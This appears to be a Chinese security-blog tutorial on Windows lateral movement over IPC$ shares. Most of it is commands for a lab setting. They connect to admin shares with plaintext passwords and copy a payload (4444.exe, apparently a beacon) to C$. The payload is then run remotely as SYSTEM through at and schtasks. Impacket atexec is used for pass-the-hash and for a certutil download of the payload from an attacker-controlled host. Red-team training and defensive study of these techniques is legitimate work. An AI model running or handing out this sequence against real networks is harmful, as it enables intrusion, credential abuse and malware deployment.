![图片[1]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440082.png)
什么是IPC?
IPC的利用条件
-
1. 获得用户名和密码 -
2. 开放了139、445端口
-
3. 管理员开启了默认共享
IPC在内网中的利用手法
IPC基础命令
-
1. 查看IPC连接与删除IPC连接
net use # 查看IPC连接
net use \serveripc$ /del # 删除IPC连接
![图片[2]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440083.png)
-
2. 建立IPC链接到目标主机
net use \server ipipc$ "password" /user:username #工作组
![图片[3]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440085.png)
net use \server ipipc$ "password" /user:domainusername #域内主机
![图片[4]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440086.png)
-
3. 查看文件列表
dir \server ipc$
![图片[5]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440087.png)
-
4. 下载与复制文件
copy \server ipc$1.ext 1.exe # 下载文件
![图片[6]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440088.png)
copy 1.bat \server ipc$ # 上传文件
![图片[7]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440091.png)
-
5. 查看文件内容
type \192.168.3.32c$ip.txt
![图片[8]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440092.png)
计划任务执行命令
![图片[9]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440095.png)
AT
![图片[10]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440096.png)
![图片[11]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440097.png)
net use \192.168.3.21ipc$ "Admin12345" /user:administrator
copy 4444.exe \192.168.3.21c$
dir \192.168.3.21c$
![图片[12]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-16764400971.png)
![图片[13]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440098.png)
net time \192.168.3.21 # 查看目标系统时间
at 192.168.3.21 16:40 C:4444.exe # 使用at计划任务执行C盘下的4444.exe
![图片[14]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440100.png)
at \192.168.3.21 1 # 查看at id=1 的计划任务
at \192.168.3.21 1 /delete # 删除at id=1 的计划任务
![图片[15]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440102.png)
![图片[16]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440103.png)
![图片[17]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440104.png)
Schtasks
net use \192.168.3.32 "admin!@#45" /user:administrator
copy 4444.exe \192.168.3.32c$
dir \192.168.3.32c$
![图片[18]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-16764401041.png)
![图片[19]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440105.png)
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn beacon /sc DAILY /tr c:4444.exe /F # 创建beacon任务对应执行文件,每天运行一次
schtasks /run /s 192.168.3.32 /tn beacon /i # 运行beacon服务
![图片[20]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440106.png)
schtasks /query | findstr beacon # 查看beacon计划任务
schtasks /delete /s 192.168.3.32 /tn beacon /f # 删除beacon计划任务
![图片[21]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440107.png)
![图片[22]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-16764401071.png)
![图片[23]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440108.png)
Impacket-atexec
atexec EXE版
![图片[24]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440109.png)
atexec.exe ./administrator:[email protected] "whoami" # 本地用户明文连接执行命令
atexec.exe god/administrator:[email protected] "whoami" #域内用户明文连接执行命令
![图片[25]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440110.png)
![图片[26]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440111.png)
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./[email protected] "whoami" # 使用hash进行本地用户连接
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 god/[email protected] "whoami" # 使用hash进行域内用户连接
![图片[27]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-16764401111.png)
![图片[28]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440112.png)
![图片[29]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440113.png)
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./[email protected] "certutil.exe -urlcache -split -f http://192.168.3.31:80/4444.exe 4444.exe"
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./[email protected] "dir | findstr 4444.exe"
![图片[30]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440114.png)
![图片[31]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440115.png)
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./[email protected] "4444.exe"
![图片[32]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-16764401151.png)
![图片[33]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440116.png)
atexec Python版
![图片[34]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440117.png)
![图片[35]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-16764401171.png)
![图片[36]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440119.png)
python atexec.py .administrator:[email protected] "whoami" # 本地明文建立IPC连接并执行命令
python atexec.py godadministrator:[email protected] "whoami" # 域内主机建立IPC连接并执行命令
![图片[37]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440121.png)
![图片[38]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440122.png)
python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./[email protected] "whoami"#本地用户使用hash进行IPC连接
python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/[email protected] "whoami"#本地用户使用hash进行IPC连接
![图片[39]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440123.png)
![图片[40]-横向移动-IPC(横向移动的轮子)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-195918-1676440125.png)
E
N
D
本文作者:TideSec
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/195918.html
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容